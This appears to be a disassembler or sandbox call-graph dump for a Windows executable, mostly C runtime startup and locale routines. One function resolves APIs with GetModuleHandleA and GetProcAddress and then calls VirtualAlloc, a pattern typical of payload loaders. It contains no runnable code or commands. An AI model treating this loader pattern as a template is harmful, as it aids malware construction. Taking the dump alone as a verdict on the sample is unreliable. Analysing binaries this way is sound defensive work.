calls 16533->16534 16535 bf101d 16534->16535 16538 bf224e __EH_prolog3 16536->16538 16540 bf2f6c 16538->16540 16539 bf22a0 ctype 16539->16533 16549 bf2c10 16540->16549 16542 bf2f77 16557 bf35c9 16542->16557 16544 bf2f8a 16545 bf2fa3 16544->16545 16546 bf1c9d std::ios_base::_Init 43 API calls 16544->16546 16547 bf2faf 16545->16547 16561 bf4065 16545->16561 16546->16545 16547->16539 16550 bf2c1c __EH_prolog3 16549->16550 16551 bf1c9d std::ios_base::_Init 43 API calls 16550->16551 16552 bf2c4d 16551->16552 16553 bf46d5 ctype 43 API calls 16552->16553 16554 bf2c54 16553->16554 16555 bf3bcf std::ios_base::_Init 47 API calls 16554->16555 16556 bf2c65 ctype 16554->16556 16555->16556 16556->16542 16558 bf35d5 __EH_prolog3 16557->16558 16566 bf2188 16558->16566 16560 bf35ed std::ios_base::_Ios_base_dtor ctype 16560->16544 16562 bf39ec std::_Lockit::_Lockit 7 API calls 16561->16562 16563 bf4075 16562->16563 16564 bf3a44 std::_Lockit::~_Lockit 2 API calls 16563->16564 16565 bf40b3 16564->16565 16565->16547 16567 bf2194 __EH_prolog3 16566->16567 16568 bf39ec std::_Lockit::_Lockit 7 API calls 16567->16568 16569 bf219e 16568->16569 16582 bf2653 16569->16582 16571 bf21c8 16573 bf3a44 std::_Lockit::~_Lockit 2 API calls 16571->16573 16572 bf21b5 16572->16571 16588 bf2aaa 16572->16588 16574 bf220f ctype 16573->16574 16574->16560 16576 bf21d8 16577 bf21df 16576->16577 16578 bf2217 16576->16578 16598 bf3b9d 16577->16598 16601 bf2d5a 16578->16601 16583 bf265f 16582->16583 16584 bf2683 16582->16584 16585 bf39ec std::_Lockit::_Lockit 7 API calls 16583->16585 16584->16572 16586 bf2669 16585->16586 16587 bf3a44 std::_Lockit::~_Lockit 2 API calls 16586->16587 16587->16584 16589 bf2ab6 __EH_prolog3 16588->16589 16590 bf2b07 ctype 16589->16590 16591 bf46d5 ctype 43 API calls 16589->16591 16590->16576 16594 bf2acf ctype 16591->16594 16592 bf2af6 16592->16590 16620 bf256d 16592->16620 16594->16592 16605 bf2391 16594->16605 16596 bf2aeb 16617 bf231b 16596->16617 16599 bf46d5 ctype 43 API calls 16598->16599 16600 bf3ba8 16599->16600 16600->16571 16602 bf2d68 Concurrency::cancel_current_task 16601->16602 16603 bf5842 std::_Xinvalid_argument RaiseException 16602->16603 16604 bf2d76 16603->16604 16606 bf239d __EH_prolog3 16605->16606 16607 bf39ec std::_Lockit::_Lockit 7 API calls 16606->16607 16608 bf23aa 16607->16608 16609 bf23de 16608->16609 16610 bf23f3 16608->16610 16637 bf3ccd 16609->16637 16646 bf1fb5 16610->16646 16613 bf23e7 ctype 16613->16596 16693 bf3de2 16617->16693 16723 bf3d18 16620->16723 16623 bf25a8 16625 bfa61a __freea 14 API calls 16623->16625 16627 bf25bb 16623->16627 16624 bfa61a __freea 14 API calls 16624->16623 16625->16627 16626 bf25cc 16629 bfa61a __freea 14 API calls 16626->16629 16631 bf25dd 16626->16631 16627->16626 16628 bfa61a __freea 14 API calls 16627->16628 16628->16626 16629->16631 16630 bf25ee 16633 bf25ff 16630->16633 16634 bfa61a __freea 14 API calls 16630->16634 16631->16630 16632 bfa61a __freea 14 API calls 16631->16632 16632->16630 16635 bf3a44 std::_Lockit::~_Lockit 2 API calls 16633->16635 16634->16633 16636 bf260a 16635->16636 16636->16590 16651 bfa94c 16637->16651 16640 bf3b27 _Yarn 15 API calls 16641 bf3cf1 16640->16641 16642 bf3d01 16641->16642 16643 bfa94c std::_Locinfo::_Locinfo_dtor 68 API calls 16641->16643 16644 bf3b27 _Yarn 15 API calls 16642->16644 16643->16642 16645 bf3d15 16644->16645 16645->16613 16690 bf1f49 16646->16690 16649 bf5842 std::_Xinvalid_argument RaiseException 16650 bf1fd4 16649->16650 16652 bff4db std::_Locinfo::_Locinfo_dtor 5 API calls 16651->16652 16653 bfa959 16652->16653 16656 bfa6f7 16653->16656 16657 bfa703 ___scrt_is_nonwritable_in_current_image 16656->16657 16664 bfa676 EnterCriticalSection 16657->16664 16659 bfa711 16665 bfa752 16659->16665 16664->16659 16666 bfa8b1 std::_Locinfo::_Locinfo_dtor 68 API calls 16665->16666 16667 bfa76d 16666->16667 16668 bfea50 __Getctype 41 API calls 16667->16668 16686 bfa71e 16667->16686 16669 bfa77a 16668->16669 16670 c0247c std::_Locinfo::_Locinfo_dtor 43 API calls 16669->16670 16671 bfa79f 16670->16671 16672 bfa7a6 16671->16672 16673 c01dc1 std::_Locinfo::_Locinfo_dtor 15 API calls 16671->16673 16675 bf8efc _Deallocate 11 API calls 16672->16675 16672->16686 16674 bfa7cb 16673->16674 16677 c0247c std::_Locinfo::_Locinfo_dtor 43 API calls 16674->16677 16674->16686 16676 bfa8b0 16675->16676 16678 bfa7e7 16677->16678 16679 bfa7ee 16678->16679 16680 bfa809 16678->16680 16679->16672 16681 bfa800 16679->16681 16683 bfed98 ___free_lconv_mon 14 API calls 16680->16683 16684 bfa834 16680->16684 16682 bfed98 ___free_lconv_mon 14 API calls 16681->16682 16682->16686 16683->16684 16685 bfed98 ___free_lconv_mon 14 API calls 16684->16685 16684->16686 16685->16686 16687 bfa746 16686->16687 16688 bfa6be std::_Lockit::~_Lockit LeaveCriticalSection 16687->16688 16689 bf3cd9 16688->16689 16689->16640 16691 bf17b6 std::exception::exception 42 API calls 16690->16691 16692 bf1f5b 16691->16692 16692->16649 16694 bfaae4 __Getctype 41 API calls 16693->16694 16695 bf3deb __Getctype 16694->16695 16696 bf3e05 16695->16696 16697 bf3e23 16695->16697 16698 bfa984 __Getctype 41 API calls 16696->16698 16699 bfa984 __Getctype 41 API calls 16697->16699 16700 bf3e0c 16698->16700 16699->16700 16701 bfab09 __Getctype 41 API calls 16700->16701 16702 bf3e34 16701->16702 16703 bf233e 16702->16703 16705 bfaf98 16702->16705 16703->16592 16706 bfafa5 16705->16706 16707 bfafe0 16705->16707 16708 bfa6ec _Yarn 15 API calls 16706->16708 16707->16703 16709 bfafc8 16708->16709 16709->16707 16714 c02c18 16709->16714 16712 bf8efc _Deallocate 11 API calls 16713 bfaff6 16712->16713 16715 c02c34 16714->16715 16716 c02c26 16714->16716 16717 bfb0d8 __dosmaperr 14 API calls 16715->16717 16716->16715 16721 c02c4e 16716->16721 16718 c02c3e 16717->16718 16719 bf8ecf __strnicoll 41 API calls 16718->16719 16720 bfafd9 16719->16720 16720->16707 16720->16712 16721->16720 16722 bfb0d8 __dosmaperr 14 API calls 16721->16722 16722->16718 16724 bf3d24 16723->16724 16726 bf2599 16723->16726 16725 bfa94c std::_Locinfo::_Locinfo_dtor 68 API calls 16724->16725 16725->16726 16726->16623 16726->16624 16915 bfc668 16918 bfc334 16915->16918 16919 bfc340 ___scrt_is_nonwritable_in_current_image 16918->16919 16926 bfa676 EnterCriticalSection 16919->16926 16921 bfc378 16927 bfc396 16921->16927 16922 bfc34a 16922->16921 16924 c066bb __Getctype 14 API calls 16922->16924 16924->16922 16926->16922 16930 bfa6be LeaveCriticalSection 16927->16930 16929 bfc384 16930->16929 13600 bf4549 13601 bf4555 ___scrt_is_nonwritable_in_current_image 13600->13601 13626 bf4881 13601->13626 13603 bf455c 13604 bf46b5 13603->13604 13613 bf4586 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 13603->13613 13675 bf4d66 IsProcessorFeaturePresent 13604->13675 13606 bf46bc 13654 bfc22a 13606->13654 13611 bf45a5 13612 bf4626 13634 bfbe68 13612->13634 13613->13611 13613->13612 13657 bfc204 13613->13657 13616 bf462c 13638 c0c25d 13616->13638 13621 bf4651 13622 bf465a 13621->13622 13666 bfc1df 13621->13666 13669 bf49f2 13622->13669 13627 bf488a 13626->13627 13682 bf4a8c IsProcessorFeaturePresent 13627->13682 13631 bf489b 13632 bf489f 13631->13632 13692 bf77fd 13631->13692 13632->13603 13635 bfbe71 13634->13635 13637 bfbe76 13634->13637 13752 bfbbc2 13635->13752 13637->13616 14403 bf10d0 13638->14403 13640 c0c27e GetModuleHandleA 14411 bf163e 13640->14411 13642 c0c29a _strlen 14415 bf1c44 13642->14415 13644 c0c2b0 _strlen 13645 bf1c44 std::ios_base::_Init 43 API calls 13644->13645 13646 c0c2c6 GetProcAddress 13645->13646 13647 c0c2e1 13646->13647 14419 c0c1f7 VirtualAlloc 13647->14419 13649 c0c2e6 14424 bf1bea 13649->14424 13652 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13653 bf4643 13652->13653 13664 bf4e80 GetModuleHandleW 13653->13664 14672 bfc012 13654->14672 13658 bfc21a __Getctype 13657->13658 13659 bfdf7a ___scrt_is_nonwritable_in_current_image 13657->13659 13658->13612 13660 bfea50 __Getctype 41 API calls 13659->13660 13663 bfdf8b 13660->13663 13661 bfaff7 __purecall 41 API calls 13662 bfdfb5 13661->13662 13663->13661 13665 bf464d 13664->13665 13665->13606 13665->13621 13667 bfc012 __CreateFrameInfo 23 API calls 13666->13667 13668 bfc1ea 13667->13668 13668->13622 13670 bf49fe 13669->13670 13671 bf4663 13670->13671 14749 bfdeeb 13670->14749 13671->13611 13673 bf4a0c 13674 bf77fd ___scrt_uninitialize_crt 7 API calls 13673->13674 13674->13671 13676 bf4d7c __fread_nolock __CreateFrameInfo 13675->13676 13677 bf4e27 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13676->13677 13678 bf4e6b __CreateFrameInfo 13677->13678 13678->13606 13679 bfc1ee 13680 bfc012 __CreateFrameInfo 23 API calls 13679->13680 13681 bf46ca 13680->13681 13683 bf4896 13682->13683 13684 bf77de 13683->13684 13698 bf88b7 13684->13698 13688 bf77fa 13688->13631 13689 bf77ef 13689->13688 13712 bf88f3 13689->13712 13691 bf77e7 13691->13631 13693 bf7806 13692->13693 13694 bf7810 13692->13694 13695 bf7976 ___vcrt_uninitialize_ptd 6 API calls 13693->13695 13694->13632 13696 bf780b 13695->13696 13697 bf88f3 ___vcrt_uninitialize_locks DeleteCriticalSection 13696->13697 13697->13694 13699 bf88c0 13698->13699 13701 bf88e9 13699->13701 13702 bf77e3 13699->13702 13716 bf8afc 13699->13716 13703 bf88f3 ___vcrt_uninitialize_locks DeleteCriticalSection 13701->13703 13702->13691 13704 bf7943 13702->13704 13703->13702 13733 bf8a0d 13704->13733 13707 bf7958 13707->13689 13710 bf7973 13710->13689 13713 bf891d 13712->13713 13714 bf88fe 13712->13714 13713->13691 13715 bf8908 DeleteCriticalSection 13714->13715 13715->13713 13715->13715 13721 bf8922 13716->13721 13719 bf8b34 InitializeCriticalSectionAndSpinCount 13720 bf8b1f 13719->13720 13720->13699 13722 bf893f 13721->13722 13723 bf8943 13721->13723 13722->13719 13722->13720 13723->13722 13725 bf89ab GetProcAddress 13723->13725 13726 bf899c 13723->13726 13728 bf89c2 LoadLibraryExW 13723->13728 13725->13722 13726->13725 13727 bf89a4 FreeLibrary 13726->13727 13727->13725 13729 bf8a09 13728->13729 13730 bf89d9 GetLastError 13728->13730 13729->13723 13730->13729 13731 bf89e4 ___vcrt_FlsFree 13730->13731 13731->13729 13732 bf89fa LoadLibraryExW 13731->13732 13732->13723 13734 bf8922 ___vcrt_FlsFree 5 API calls 13733->13734 13735 bf8a27 13734->13735 13736 bf8a40 TlsAlloc 13735->13736 13737 bf794d 13735->13737 13737->13707 13738 bf8abe 13737->13738 13739 bf8922 ___vcrt_FlsFree 5 API calls 13738->13739 13740 bf8ad8 13739->13740 13741 bf8af3 TlsSetValue 13740->13741 13742 bf7966 13740->13742 13741->13742 13742->13710 13743 bf7976 13742->13743 13744 bf7986 13743->13744 13745 bf7980 13743->13745 13744->13707 13747 bf8a48 13745->13747 13748 bf8922 ___vcrt_FlsFree 5 API calls 13747->13748 13749 bf8a62 13748->13749 13750 bf8a7a TlsFree 13749->13750 13751 bf8a6e 13749->13751 13750->13751 13751->13744 13753 bfbbe1 13752->13753 13754 bfbbcb 13752->13754 13753->13637 13754->13753 13758 bfbbee 13754->13758 13756 bfbbd8 13756->13753 13775 bfbd59 13756->13775 13759 bfbbfa 13758->13759 13760 bfbbf7 13758->13760 13783 c04ca4 13759->13783 13760->13756 13765 bfbc0b 13810 bfed98 13765->13810 13766 bfbc17 13816 bfbc48 13766->13816 13771 bfed98 ___free_lconv_mon 14 API calls 13772 bfbc3b 13771->13772 13773 bfed98 ___free_lconv_mon 14 API calls 13772->13773 13774 bfbc41 13773->13774 13774->13756 13776 bfbdca 13775->13776 13781 bfbd68 13775->13781 13776->13753 13777 c03bf4 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13777->13781 13778 bfed3b __Getctype 14 API calls 13778->13781 13779 bfbdce 13780 bfed98 ___free_lconv_mon 14 API calls 13779->13780 13780->13776 13781->13776 13781->13777 13781->13778 13781->13779 13782 bfed98 ___free_lconv_mon 14 API calls 13781->13782 13782->13781 13784 bfbc00 13783->13784 13785 c04cad 13783->13785 13789 c04fa6 GetEnvironmentStringsW 13784->13789 13838 bfeb0b 13785->13838 13790 bfbc05 13789->13790 13791 c04fbe 13789->13791 13790->13765 13790->13766 13792 c03bf4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13791->13792 13793 c04fdb 13792->13793 13794 c04ff0 13793->13794 13795 c04fe5 FreeEnvironmentStringsW 13793->13795 13796 c01dc1 std::_Locinfo::_Locinfo_dtor 15 API calls 13794->13796 13795->13790 13797 c04ff7 13796->13797 13798 c05010 13797->13798 13799 c04fff 13797->13799 13801 c03bf4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13798->13801 13800 bfed98 ___free_lconv_mon 14 API calls 13799->13800 13802 c05004 FreeEnvironmentStringsW 13800->13802 13803 c05020 13801->13803 13802->13790 13804 c05027 13803->13804 13805 c0502f 13803->13805 13806 bfed98 ___free_lconv_mon 14 API calls 13804->13806 13807 bfed98 ___free_lconv_mon 14 API calls 13805->13807 13808 c0502d FreeEnvironmentStringsW 13806->13808 13807->13808 13808->13790 13811 bfeda3 HeapFree 13810->13811 13812 bfbc11 13810->13812 13811->13812 13813 bfedb8 GetLastError 13811->13813 13812->13756 13814 bfedc5 __dosmaperr 13813->13814 13815 bfb0d8 __dosmaperr 12 API calls 13814->13815 13815->13812 13817 bfbc5d 13816->13817 13818 bfed3b __Getctype 14 API calls 13817->13818 13819 bfbc84 13818->13819 13820 bfbc8c 13819->13820 13829 bfbc96 13819->13829 13821 bfed98 ___free_lconv_mon 14 API calls 13820->13821 13837 bfbc1e 13821->13837 13822 bfbcf3 13823 bfed98 ___free_lconv_mon 14 API calls 13822->13823 13823->13837 13824 bfed3b __Getctype 14 API calls 13824->13829 13825 bfbd02 14393 bfbd2a 13825->14393 13829->13822 13829->13824 13829->13825 13831 bfbd1d 13829->13831 13833 bfed98 ___free_lconv_mon 14 API calls 13829->13833 14384 bfdfb6 13829->14384 13830 bfed98 ___free_lconv_mon 14 API calls 13832 bfbd0f 13830->13832 14399 bf8efc IsProcessorFeaturePresent 13831->14399 13835 bfed98 ___free_lconv_mon 14 API calls 13832->13835 13833->13829 13835->13837 13836 bfbd29 13837->13771 13839 bfeb1c 13838->13839 13840 bfeb16 13838->13840 13860 bfeb22 13839->13860 13891 bff2c3 13839->13891 13886 bff284 13840->13886 13845 bfeb27 13863 c04aaf 13845->13863 13848 bfeb46 13849 bfeb4e 13848->13849 13850 bfeb63 13848->13850 13852 bff2c3 __Getctype 6 API calls 13849->13852 13851 bff2c3 __Getctype 6 API calls 13850->13851 13853 bfeb6f 13851->13853 13854 bfeb5a 13852->13854 13855 bfeb73 13853->13855 13856 bfeb82 13853->13856 13857 bfed98 ___free_lconv_mon 14 API calls 13854->13857 13858 bff2c3 __Getctype 6 API calls 13855->13858 13903 bfe87e 13856->13903 13857->13860 13858->13854 13860->13845 13908 bfaff7 13860->13908 13862 bfed98 ___free_lconv_mon 14 API calls 13862->13845 14189 c04c04 13863->14189 13869 c04b03 13870 c04b19 13869->13870 13871 c04b0b 13869->13871 14214 c04cff 13870->14214 13872 bfed98 ___free_lconv_mon 14 API calls 13871->13872 13874 c04af2 13872->13874 13874->13784 13876 c04b51 13877 bfb0d8 __dosmaperr 14 API calls 13876->13877 13879 c04b56 13877->13879 13878 c04b98 13881 c04be1 13878->13881 14225 c04721 13878->14225 13882 bfed98 ___free_lconv_mon 14 API calls 13879->13882 13880 c04b6c 13880->13878 13883 bfed98 ___free_lconv_mon 14 API calls 13880->13883 13885 bfed98 ___free_lconv_mon 14 API calls 13881->13885 13882->13874 13883->13878 13885->13874 13919 bff073 13886->13919 13889 bff2bb TlsGetValue 13890 bff2a9 13890->13839 13892 bff073 __Getctype 5 API calls 13891->13892 13893 bff2df 13892->13893 13894 bff2fd TlsSetValue 13893->13894 13895 bfeb36 13893->13895 13895->13860 13896 bfed3b 13895->13896 13901 bfed48 __Getctype 13896->13901 13897 bfed88 13937 bfb0d8 13897->13937 13898 bfed73 HeapAlloc 13900 bfed86 13898->13900 13898->13901 13900->13848 13901->13897 13901->13898 13934 bfda13 13901->13934 13974 bfe712 13903->13974 14076 c02d4a 13908->14076 13911 bfb007 13912 bfb030 13911->13912 13913 bfb011 IsProcessorFeaturePresent 13911->13913 13916 bfc1ee __CreateFrameInfo 23 API calls 13912->13916 13915 bfb01d 13913->13915 14106 bf8cd3 13915->14106 13918 bfb03a 13916->13918 13920 bff0a1 13919->13920 13924 bff09d 13919->13924 13920->13924 13926 bfefa8 13920->13926 13923 bff0bb GetProcAddress 13923->13924 13925 bff0cb __Getctype 13923->13925 13924->13889 13924->13890 13925->13924 13932 bfefb9 ___vcrt_FlsFree 13926->13932 13927 bff04f 13927->13923 13927->13924 13928 bfefd7 LoadLibraryExW 13929 bff056 13928->13929 13930 bfeff2 GetLastError 13928->13930 13929->13927 13931 bff068 FreeLibrary 13929->13931 13930->13932 13931->13927 13932->13927 13932->13928 13933 bff025 LoadLibraryExW 13932->13933 13933->13929 13933->13932 13940 bfda40 13934->13940 13951 bfeba1 GetLastError 13937->13951 13939 bfb0dd 13939->13900 13941 bfda4c ___scrt_is_nonwritable_in_current_image 13940->13941 13946 bfa676 EnterCriticalSection 13941->13946 13943 bfda57 13947 bfda93 13943->13947 13946->13943 13950 bfa6be LeaveCriticalSection 13947->13950 13949 bfda1e 13949->13901 13950->13949 13952 bfebb7 13951->13952 13953 bfebbd 13951->13953 13954 bff284 __Getctype 6 API calls 13952->13954 13955 bff2c3 __Getctype 6 API calls 13953->13955 13956 bfebc1 SetLastError 13953->13956 13954->13953 13957 bfebd9 13955->13957 13956->13939 13957->13956 13959 bfed3b __Getctype 12 API calls 13957->13959 13960 bfebee 13959->13960 13961 bfec07 13960->13961 13962 bfebf6 13960->13962 13963 bff2c3 __Getctype 6 API calls 13961->13963 13964 bff2c3 __Getctype 6 API calls 13962->13964 13965 bfec13 13963->13965 13966 bfec04 13964->13966 13967 bfec2e 13965->13967 13968 bfec17 13965->13968 13970 bfed98 ___free_lconv_mon 12 API calls 13966->13970 13971 bfe87e __Getctype 12 API calls 13967->13971 13969 bff2c3 __Getctype 6 API calls 13968->13969 13969->13966 13970->13956 13972 bfec39 13971->13972 13973 bfed98 ___free_lconv_mon 12 API calls 13972->13973 13973->13956 13975 bfe71e ___scrt_is_nonwritable_in_current_image 13974->13975 13988 bfa676 EnterCriticalSection 13975->13988 13977 bfe728 13989 bfe758 13977->13989 13980 bfe824 13981 bfe830 ___scrt_is_nonwritable_in_current_image 13980->13981 13993 bfa676 EnterCriticalSection 13981->13993 13983 bfe83a 13994 bfea05 13983->13994 13985 bfe852 13998 bfe872 13985->13998 13988->13977 13992 bfa6be LeaveCriticalSection 13989->13992 13991 bfe746 13991->13980 13992->13991 13993->13983 13995 bfea3b __Getctype 13994->13995 13996 bfea14 __Getctype 13994->13996 13995->13985 13996->13995 14001 c063ee 13996->14001 14075 bfa6be LeaveCriticalSection 13998->14075 14000 bfe860 14000->13862 14003 c0646e 14001->14003 14004 c06404 14001->14004 14005 bfed98 ___free_lconv_mon 14 API calls 14003->14005 14027 c064bc 14003->14027 14004->14003 14009 bfed98 ___free_lconv_mon 14 API calls 14004->14009 14011 c06437 14004->14011 14006 c06490 14005->14006 14007 bfed98 ___free_lconv_mon 14 API calls 14006->14007 14012 c064a3 14007->14012 14008 bfed98 ___free_lconv_mon 14 API calls 14015 c06463 14008->14015 14017 c0642c 14009->14017 14010 c064ca 14016 c0652a 14010->14016 14028 bfed98 14 API calls ___free_lconv_mon 14010->14028 14013 bfed98 ___free_lconv_mon 14 API calls 14011->14013 14026 c06459 14011->14026 14014 bfed98 ___free_lconv_mon 14 API calls 14012->14014 14018 c0644e 14013->14018 14019 c064b1 14014->14019 14020 bfed98 ___free_lconv_mon 14 API calls 14015->14020 14021 bfed98 ___free_lconv_mon 14 API calls 14016->14021 14029 c056a4 14017->14029 14057 c05b58 14018->14057 14024 bfed98 ___free_lconv_mon 14 API calls 14019->14024 14020->14003 14025 c06530 14021->14025 14024->14027 14025->13995 14026->14008 14069 c0655f 14027->14069 14028->14010 14030 c056b5 14029->14030 14056 c0579e 14029->14056 14031 c056c6 14030->14031 14032 bfed98 ___free_lconv_mon 14 API calls 14030->14032 14033 c056d8 14031->14033 14034 bfed98 ___free_lconv_mon 14 API calls 14031->14034 14032->14031 14035 c056ea 14033->14035 14036 bfed98 ___free_lconv_mon 14 API calls 14033->14036 14034->14033 14037 bfed98 ___free_lconv_mon 14 API calls 14035->14037 14041 c056fc 14035->14041 14036->14035 14037->14041 14038 bfed98 ___free_lconv_mon 14 API calls 14040 c0570e 14038->14040 14039 c05720 14043 c05732 14039->14043 14044 bfed98 ___free_lconv_mon 14 API calls 14039->14044 14040->14039 14042 bfed98 ___free_lconv_mon 14 API calls 14040->14042 14041->14038 14041->14040 14042->14039 14045 c05744 14043->14045 14047 bfed98 ___free_lconv_mon 14 API calls 14043->14047 14044->14043 14046 c05756 14045->14046 14048 bfed98 ___free_lconv_mon 14 API calls 14045->14048 14049 c05768 14046->14049 14050 bfed98 ___free_lconv_mon 14 API calls 14046->14050 14047->14045 14048->14046 14051 c0577a 14049->14051 14052 bfed98 ___free_lconv_mon 14 API calls 14049->14052 14050->14049 14053 c0578c 14051->14053 14054 bfed98 ___free_lconv_mon 14 API calls 14051->14054 14052->14051 14055 bfed98 ___free_lconv_mon 14 API calls 14053->14055 14053->14056 14054->14053 14055->14056 14056->14011 14058 c05b65 14057->14058 14068 c05bbd 14057->14068 14059 c05b75 14058->14059 14060 bfed98 ___free_lconv_mon 14 API calls 14058->14060 14061 c05b87 14059->14061 14062 bfed98 ___free_lconv_mon 14 API calls 14059->14062 14060->14059 14063 bfed98 ___free_lconv_mon 14 API calls 14061->14063 14064 c05b99 14061->14064 14062->14061 14063->14064 14065 c05bab 14064->14065 14066 bfed98 ___free_lconv_mon 14 API calls 14064->14066 14067 bfed98 ___free_lconv_mon 14 API calls 14065->14067 14065->14068 14066->14065 14067->14068 14068->14026 14070 c0656c 14069->14070 14071 c0658b 14069->14071 14070->14071 14072 c06073 __Getctype 14 API calls 14070->14072 14071->14010 14073 c06585 14072->14073 14074 bfed98 ___free_lconv_mon 14 API calls 14073->14074 14074->14071 14075->14000 14112 c02c7c 14076->14112 14079 c02d8f 14080 c02d9b ___scrt_is_nonwritable_in_current_image 14079->14080 14081 bfeba1 __dosmaperr 14 API calls 14080->14081 14085 c02dc8 __CreateFrameInfo 14080->14085 14086 c02dc2 __CreateFrameInfo 14080->14086 14081->14086 14082 c02e0f 14083 bfb0d8 __dosmaperr 14 API calls 14082->14083 14084 c02e14 14083->14084 14123 bf8ecf 14084->14123 14088 c02e3b 14085->14088 14126 bfa676 EnterCriticalSection 14085->14126 14086->14082 14086->14085 14105 c02df9 14086->14105 14091 c02e7d 14088->14091 14092 c02f6e 14088->14092 14102 c02eac 14088->14102 14091->14102 14127 bfea50 GetLastError 14091->14127 14094 c02f79 14092->14094 14158 bfa6be LeaveCriticalSection 14092->14158 14096 bfc1ee __CreateFrameInfo 23 API calls 14094->14096 14098 c02f81 14096->14098 14099 bfea50 __Getctype 41 API calls 14103 c02f01 14099->14103 14101 bfea50 __Getctype 41 API calls 14101->14102 14154 c02f1b 14102->14154 14104 bfea50 __Getctype 41 API calls 14103->14104 14103->14105 14104->14105 14105->13911 14107 bf8cef __fread_nolock __CreateFrameInfo 14106->14107 14108 bf8d1b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14107->14108 14109 bf8dec __CreateFrameInfo 14108->14109 14181 bf4713 14109->14181 14111 bf8e0a 14111->13912 14113 c02c88 ___scrt_is_nonwritable_in_current_image 14112->14113 14118 bfa676 EnterCriticalSection 14113->14118 14115 c02c96 14119 c02cd4 14115->14119 14118->14115 14122 bfa6be LeaveCriticalSection 14119->14122 14121 bfaffc 14121->13911 14121->14079 14122->14121 14159 bf8e1b 14123->14159 14126->14088 14128 bfea66 14127->14128 14129 bfea6c 14127->14129 14130 bff284 __Getctype 6 API calls 14128->14130 14131 bff2c3 __Getctype 6 API calls 14129->14131 14133 bfea70 SetLastError 14129->14133 14130->14129 14132 bfea88 14131->14132 14132->14133 14135 bfed3b __Getctype 14 API calls 14132->14135 14137 bfeb05 14133->14137 14138 bfeb00 14133->14138 14136 bfea9d 14135->14136 14139 bfeab6 14136->14139 14140 bfeaa5 14136->14140 14141 bfaff7 __purecall 39 API calls 14137->14141 14138->14101 14143 bff2c3 __Getctype 6 API calls 14139->14143 14142 bff2c3 __Getctype 6 API calls 14140->14142 14144 bfeb0a 14141->14144 14146 bfeab3 14142->14146 14145 bfeac2 14143->14145 14147 bfeadd 14145->14147 14148 bfeac6 14145->14148 14151 bfed98 ___free_lconv_mon 14 API calls 14146->14151 14149 bfe87e __Getctype 14 API calls 14147->14149 14150 bff2c3 __Getctype 6 API calls 14148->14150 14152 bfeae8 14149->14152 14150->14146 14151->14133 14153 bfed98 ___free_lconv_mon 14 API calls 14152->14153 14153->14133 14155 c02f21 14154->14155 14156 c02ef2 14154->14156 14180 bfa6be LeaveCriticalSection 14155->14180 14156->14099 14156->14103 14156->14105 14158->14094 14160 bf8e2d _Fputc 14159->14160 14165 bf8e52 14160->14165 14166 bf8e69 14165->14166 14167 bf8e62 14165->14167 14169 bf8e45 14166->14169 14170 bf8c47 _Deallocate GetLastError SetLastError 14166->14170 14168 bf8c70 _Fputc 16 API calls 14167->14168 14168->14166 14174 bf8c0b 14169->14174 14171 bf8e9e 14170->14171 14171->14169 14172 bf8efc _Deallocate 11 API calls 14171->14172 14173 bf8ece 14172->14173 14175 bf8c17 14174->14175 14176 bf8cb6 _Fputc 41 API calls 14175->14176 14177 bf8c2e 14175->14177 14176->14177 14178 bf8cb6 _Fputc 41 API calls 14177->14178 14179 bf8c41 14177->14179 14178->14179 14179->14105 14180->14156 14182 bf471c IsProcessorFeaturePresent 14181->14182 14183 bf471b 14181->14183 14185 bf5036 14182->14185 14183->14111 14188 bf4ff9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14185->14188 14187 bf5119 14187->14111 14188->14187 14190 c04c10 ___scrt_is_nonwritable_in_current_image 14189->14190 14191 c04c2a 14190->14191 14233 bfa676 EnterCriticalSection 14190->14233 14193 c04ad9 14191->14193 14196 bfaff7 __purecall 41 API calls 14191->14196 14200 c0482f 14193->14200 14194 c04c66 14234 c04c83 14194->14234 14197 c04ca3 14196->14197 14198 c04c3a 14198->14194 14199 bfed98 ___free_lconv_mon 14 API calls 14198->14199 14199->14194 14238 bfb0eb 14200->14238 14203 c04850 GetOEMCP 14206 c04879 14203->14206 14204 c04862 14205 c04867 GetACP 14204->14205 14204->14206 14205->14206 14206->13874 14207 c01dc1 14206->14207 14208 c01dff 14207->14208 14209 c01dcf __Getctype 14207->14209 14210 bfb0d8 __dosmaperr 14 API calls 14208->14210 14209->14208 14211 c01dea HeapAlloc 14209->14211 14213 bfda13 ctype 2 API calls 14209->14213 14212 c01dfd 14210->14212 14211->14209 14211->14212 14212->13869 14213->14209 14215 c0482f 43 API calls 14214->14215 14216 c04d1f 14215->14216 14217 c04d5c IsValidCodePage 14216->14217 14223 c04d98 __fread_nolock 14216->14223 14219 c04d6e 14217->14219 14217->14223 14218 bf4713 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14220 c04b46 14218->14220 14221 c04d9d GetCPInfo 14219->14221 14224 c04d77 __fread_nolock 14219->14224 14220->13876 14220->13880 14221->14223 14221->14224 14223->14218 14223->14223 14280 c04903 14224->14280 14226 c0472d ___scrt_is_nonwritable_in_current_image 14225->14226 14358 bfa676 EnterCriticalSection 14226->14358 14228 c04737 14359 c0476e 14228->14359 14233->14198 14237 bfa6be LeaveCriticalSection 14234->14237 14236 c04c8a 14236->14191 14237->14236 14239 bfb109 14238->14239 14240 bfb102 14238->14240 14239->14240 14241 bfea50 __Getctype 41 API calls 14239->14241 14240->14203 14240->14204 14242 bfb12a 14241->14242 14246 c024ba 14242->14246 14247 bfb140 14246->14247 14248 c024cd 14246->14248 14250 c02518 14247->14250 14248->14247 14254 c0663a 14248->14254 14251 c02540 14250->14251 14252 c0252b 14250->14252 14251->14240 14252->14251 14275 c04cec 14252->14275 14255 c06646 ___scrt_is_nonwritable_in_current_image 14254->14255 14256 bfea50 __Getctype 41 API calls 14255->14256 14257 c0664f 14256->14257 14264 c06695 14257->14264 14267 bfa676 EnterCriticalSection 14257->14267 14259 c0666d 14268 c066bb 14259->14268 14264->14247 14265 bfaff7 __purecall 41 API calls 14266 c066ba 14265->14266 14267->14259 14269 c0667e 14268->14269 14270 c066c9 __Getctype 14268->14270 14272 c0669a 